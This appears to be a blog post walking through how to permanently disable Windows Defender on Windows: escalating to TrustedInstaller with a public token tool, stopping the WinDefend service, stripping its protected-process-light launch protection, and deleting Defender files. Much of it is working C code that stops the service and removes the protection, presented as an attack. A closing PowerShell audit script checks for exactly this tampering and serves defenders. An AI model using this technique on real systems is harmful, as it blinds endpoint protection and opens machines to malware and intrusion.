Bypass ppl protection and shut down Windows Defender

Description

You can stop the Windows Defender service, remove its PPL protection by elevating privileges, and then delete DLLs and other files belonging to Windows Defender, so that the Windows Defender service can no longer run, resulting in a denial of service.

Attack steps

1. Elevate privileges to TrustedInstaller

We use the TrustedInstaller group token (obtained by automatically stealing the SYSTEM token first) to elevate to TrustedInstaller privileges.

Here, we use an open source tool for this step:

https://github.com/0xbadjuju/Tokenvator

Elevate to TrustedInstaller and use that privilege to open a new cmd.exe.

This cmd.exe then also runs with TrustedInstaller privileges.

2. Stop the Windows Defender service

In fact, this is not a vulnerability, because administrator permissions can already shut down the Windows Defender service directly and temporarily.

However, a service stopped this way can be started again manually or restarted automatically. What we want is to shut down the Windows Defender service permanently. In the hacker's mind, the goal is that there is no way to start the Windows Defender service again, short of reinstalling the system. Ha ha ha....

3. Remove the PsProtectSignerAntimalware-Light protection

Quick background on "protection":

Protected processes first appeared in Windows Vista as a hardening of key Windows user-mode services, and later evolved into protected process light (PPL) in Windows 8.1. In general, executables must be signed with a special certificate before they can run as a protected process (PPL).

From the Microsoft documentation, we know:

https://docs.microsoft.com/en-us/windows/win32/api/winsvc/nf-winsvc-changeserviceconfig2w

As long as we have sufficient access rights to the service object, we can change the service's protection level; that is, we can turn off PPL on the Windows Defender service. Testing shows that the service ACL does not allow the SYSTEM account or the Administrators group to modify or stop the Windows Defender service at all. However, it does allow WinDefend and TrustedInstaller to modify or stop it, and we obtained full TrustedInstaller privileges in step 1.

So we can disable PsProtectSignerAntimalware-Light on the Windows Defender service, and then modify and delete the necessary Windows Defender components to shut the Windows Defender service down permanently.

The Windows Defender files live under:

C:\Program Files\Windows Defender
C:\Program Files\Windows Defender Advanced Threat Protection
C:\Program Files (x86)\Windows Defender

We cannot make any changes to these files while PPL is in effect.

Likewise, these modifications cannot be performed even with TrustedInstaller privileges.

So we use the TrustedInstaller privileges to remove the PsProtectSignerAntimalware-Light protection through ChangeServiceConfig2W, and then modify and delete the necessary Windows Defender components to shut the Windows Defender service down permanently.

  SC_HANDLE tt = OpenSCManager(NULL, NULL, GENERIC_READ); // Establish a connection to the service control manager
  SC_HANDLE windefend_svc = OpenServiceW(tt, L"WinDefend", SERVICE_START | SERVICE_STOP | GENERIC_READ | SERVICE_CHANGE_CONFIG | SERVICE_USER_DEFINED_CONTROL);
  // Open the existing WinDefend service
  if (windefend_svc == NULL) {
    printf("\n[-] Failed to open WinDefend service.");
    return 1;
  }
  printf("Done.\n");

  SERVICE_STATUS svc_status;
  if (!ControlService(windefend_svc, SERVICE_CONTROL_STOP, &svc_status)) {
    // Send the stop control to the WinDefend service
    printf("[-] Failed to stop WinDefend service :(");
    return 1;
  }
  printf("[+] Successfully sent service stop control.\n");
  SERVICE_LAUNCH_PROTECTED_INFO info;
  DWORD ret_sz = 0;

  QueryServiceConfig2W(windefend_svc, SERVICE_CONFIG_LAUNCH_PROTECTED, (LPBYTE)&info, sizeof(SERVICE_LAUNCH_PROTECTED_INFO), &ret_sz);
  // Retrieve the optional configuration parameters (launch protection level) of the WinDefend service
  if (info.dwLaunchProtected == SERVICE_LAUNCH_PROTECTED_NONE)
    goto WaitDefender;
  info.dwLaunchProtected = SERVICE_LAUNCH_PROTECTED_NONE;
  if (!ChangeServiceConfig2W(windefend_svc, SERVICE_CONFIG_LAUNCH_PROTECTED, &info)) {
    printf("[-] Failed to remove PsProtectSignerAntimalware-Light from WinDefend service :(");
    return 1;
  }
  printf("[+] Successfully removed PsProtectSignerAntimalware-Light from WinDefend service.\n");
WaitDefender:
  printf("[*] Waiting for WinDefend to stop...\n");
  // hwindefend is a handle to the Defender service process obtained earlier; that part is not shown in this excerpt
  WaitForSingleObject(hwindefend, INFINITE);
  CloseHandle(hwindefend);
  printf("[!] Attempting to unload WdFilter.sys ... ");

Then modify and delete the necessary Windows Defender components to shut the Windows Defender service down permanently.
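For defenders, the two preconditions this technique depends on (the WinDefend launch protection level, and which principals hold change-config or stop rights on the service ACL) can be audited from an elevated PowerShell session. This is an added check, not code from the original post or from Microsoft; it assumes Windows 8.1 or later, that sc.exe is available, and that the service key's LaunchProtected value mirrors the SERVICE_LAUNCH_PROTECTED_* constants.

```powershell
# Added audit script, not code from the original post. Assumes Windows 8.1 or
# later, an elevated PowerShell session, and that sc.exe is available.
$svc = 'WinDefend'

# --- Check 1: launch protection level stored in the service key -------------
# Values follow SERVICE_LAUNCH_PROTECTED_* in winsvc.h; Defender should be 3.
$levels = @{ 0 = 'None'; 1 = 'Windows'; 2 = 'Windows-Light'; 3 = 'Antimalware-Light'; 4 = 'App-Light' }
$key = "HKLM:\SYSTEM\CurrentControlSet\Services\$svc"
$lp = (Get-ItemProperty -Path $key -Name LaunchProtected -ErrorAction SilentlyContinue).LaunchProtected
if ($null -eq $lp) { $lp = 0 }   # a missing value means no launch protection
$tag = if ($lp -eq 3) { 'OK' } else { 'ALERT' }
"[$tag] $svc LaunchProtected = $lp ($($levels[[int]$lp]))"

# --- Check 2: which principals may change config (0x2) or stop (0x20) -------
# The post relies on only WinDefend itself and TrustedInstaller holding these,
# so any other allow ACE carrying those rights (or a generic right that maps
# to them) is worth an alert.
$expected = @("NT SERVICE\$svc", 'NT SERVICE\TrustedInstaller') | ForEach-Object {
    (New-Object System.Security.Principal.NTAccount($_)).Translate(
        [System.Security.Principal.SecurityIdentifier]).Value
}
$sddl = (& sc.exe sdshow $svc | Where-Object { $_ -match '^D:' } | Select-Object -First 1).Trim()
$sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
foreach ($ace in $sd.DiscretionaryAcl) {
    if ($ace.AceQualifier -ne 'AccessAllowed') { continue }
    $mask = $ace.AccessMask
    $rights = @()
    # SERVICE_CHANGE_CONFIG, or GENERIC_ALL / GENERIC_WRITE which map to it
    if (($mask -band 0x2) -or ($mask -band 0x10000000) -or ($mask -band 0x40000000)) { $rights += 'change-config' }
    # SERVICE_STOP, or GENERIC_ALL / GENERIC_EXECUTE which map to it
    if (($mask -band 0x20) -or ($mask -band 0x10000000) -or ($mask -band 0x20000000)) { $rights += 'stop' }
    if ($rights.Count -eq 0) { continue }
    $sid = $ace.SecurityIdentifier.Value
    $name = try { $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value } catch { $sid }
    $tag = if ($expected -contains $sid) { 'OK' } else { 'ALERT' }
    "[$tag] $name ($sid) may: $($rights -join ', ')"
}
```

An ALERT on check 1 after a reboot, or a change-config ACE for a principal other than the two expected service SIDs, is the state this post's steps leave behind and should be treated as tampering.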

Added by phpmania1 on Mon, 13 Dec 2021 13:54:03 +0200